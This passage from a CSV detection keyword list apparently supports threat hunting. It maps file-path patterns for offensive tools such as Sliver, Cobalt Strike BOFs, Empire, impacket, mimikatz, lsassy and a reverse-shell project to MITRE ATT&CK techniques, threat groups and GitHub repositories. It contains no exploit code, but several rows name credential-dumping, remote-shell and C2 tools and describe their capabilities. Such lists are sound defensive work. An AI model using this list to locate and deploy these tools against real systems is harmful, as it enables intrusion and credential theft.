- T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/silentdump.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/SilentHound.git*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*/SilentMoonwalk.git*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*/silentprocessexit.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/silenttrinity/*.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*/simple_hijacker/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/Simple-Reverse-Shell*","offensive_tool_keyword","Simple-Reverse-Shell","Simple C++ reverse shell without obfuscation to avoid Win 11 defender detection (At the time of publication","T1548 - T1562 - T1027","TA0003 - TA0008","N/A","N/A","Shell spawning","https://github.com/tihanyin/Simple-Reverse-Shell/","1","1","N/A","N/A","2","114","30","2021-12-21T15:51:48Z","2021-12-19T22:16:32Z" +"*/SimplyEmail.git*","offensive_tool_keyword","SimplyEmail","SimplyEmail was built arround the concept that tools should do somthing. and do that somthing well. hence simply What is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester.","T1210.001 - T1190 - T1583.001 - T1590","TA0007 - TA0002 - ","N/A","N/A","Reconnaissance","https://github.com/SimplySecurity/SimplyEmail","1","1","N/A","5","10","918","242","2023-01-12T22:20:25Z","2015-10-30T03:12:10Z" +"*/sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sip-call-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sip-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sip-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Sitadel.git*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*/sitadel.log*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*/sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","1","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*/sites-available/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/sites-enabled/striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*/situational_awareness/*.exe","offensive_tool_keyword","empire","Empire executable paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1143","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/situational_awareness/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1147","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/skelsec/pypykatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Slackor.git*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/Slackor/*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/sleep_python_bridge/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/Sleeper/Sleeper.cna*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/sleepmask.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/SlinkyCat.git*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" +"*/sliver.git*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.pb.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver.proto*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver/evasion/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/sliver-server*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/smb.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/SMB_RPC/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb2-vuln-uptime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb3.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/smb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/smb-cmds.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/smb-double-pulsar-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 